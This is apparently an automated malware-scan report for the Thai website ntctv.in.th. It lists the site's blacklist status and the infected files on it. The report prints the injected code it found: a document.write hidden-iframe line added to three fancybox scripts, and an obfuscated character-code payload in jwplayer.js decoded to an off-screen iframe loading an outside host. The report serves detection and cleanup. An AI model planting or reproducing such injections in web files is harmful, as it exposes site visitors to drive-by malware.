Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ntctv.in.th
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ntctv.in.th/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ntctv.in.th/ | 200 OK Content-Length: 4489 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $("#various1").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("#various2").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("# }); $("#various5").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("#various6").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); }); Note: this excerpt is truncated and shows only fancybox initialization calls; the content that triggered the detection is not visible in it. Presumably the page is flagged because it loads the infected scripts listed below; confirm against the full page source. Antivirus reports:
| ||
http://ntctv.in.th/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1449 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720></iframe>'); (function(d){function g(a){var b=a||window.event,i=[].slice.call(arguments,1),c=0,h=0,e=0;a=d.event.fix(b);a.type="mousewheel";if(a.wheelDelta)c=a.wheelDelta/120;if(a.detail)c=-a.detail/3;e=c;if(b.axis!==undefined&&b.axis===b.HORIZONTAL_AXIS){e=0;h=-1*c}if(b.wheelDeltaY!==undefined)e=b.wheelDeltaY/120;if(b f.length;a;)this.addEventListener(f[--a],g,false);else this.onmousewheel=g},teardown:function(){if(this.removeEventListener)for(var a=f.length;a;)this.removeEventListener(f[--a],g,false);else this.onmousewheel=null}};d.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(jQuery); Antivirus reports:
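Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=493720 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720> Note: the document.write line sits in front of what otherwise looks like the stock jQuery mousewheel plugin, and the same line is prepended to the other two files under /fancybox/. This suggests the script files on the server were modified; comparing them against clean upstream copies would confirm it. | ||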
http://ntctv.in.th/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15794 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720></iframe>'); ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide(); easingOut:"swing",showCloseButton:true,showNavArrows:true,enableEscapeButton:true,enableKeyboardNav:true,onStart:function(){},onCancel:function(){},onComplete:function(){},onCleanup:function(){},onClosed:function(){},onError:function(){}};b(document).ready(function(){b.fancybox.init()})})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=493720 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720> | ||
http://ntctv.in.th/fancybox/video.js | 200 OK Content-Length: 593 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720></iframe>'); jQuery(document).ready(function() { $(".video").click(function() { $.fancybox({ 'padding' : 0, 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'title' : this.title, 'width' : 640, 'height' : 385, 'href' : this.href.replace(), 'type' : 'swf', 'swf' : { 'wmode' : 'transparent', 'allowfullscreen' : 'true' } }); return false; }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=493720 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720> | ||
http://ntctv.in.th/js/jwplayer.js | 200 OK Content-Length: 155953 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Note: the obfuscated block (truncated here) stores its payload as an array of character codes, and the fr="fromChar" fragment points to String.fromCharCode-style decoding. The decoded result adds an iframe positioned off-screen at -999em that loads a third-party URL. This file carries a different injection and a different destination host from the /fancybox/ files, so cleanup should not assume a single injected pattern. Antivirus reports:
| ||
http://ntctv.in.th/index.php | 200 OK Content-Length: 4489 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $("#various1").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("#various2").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("# }); $("#various5").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("#various6").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); }); Note: this excerpt is truncated and shows only fancybox initialization calls; the content that triggered the detection is not visible in it. Presumably the page is flagged because it loads the infected scripts listed above; confirm against the full page source. Antivirus reports:
| ||
http://ntctv.in.th/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ntctv.in.th
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Aug 2014 05:53:28 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 4489
Content-Type: text/html
X-Powered-By: PHP/5.5.10
...4489 bytes of data.
GET / HTTP/1.1
Host: ntctv.in.th
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Aug 2014 05:53:28 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 4489
Content-Type: text/html
X-Powered-By: PHP/5.5.10
...4489 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ntctv.in.th
Referer: http://www.google.com/search?q=ntctv.in.th
Result:
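The result is similar to the first query. There are no suspicious redirects found. This check covers only HTTP-level redirects for the two requests shown; it does not cover the iframes injected into the script files listed under "Scanned pages/files".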
GET / HTTP/1.1
Host: ntctv.in.th
Referer: http://www.google.com/search?q=ntctv.in.th
Result:
The result is similar to the first query. There are no suspicious redirects found.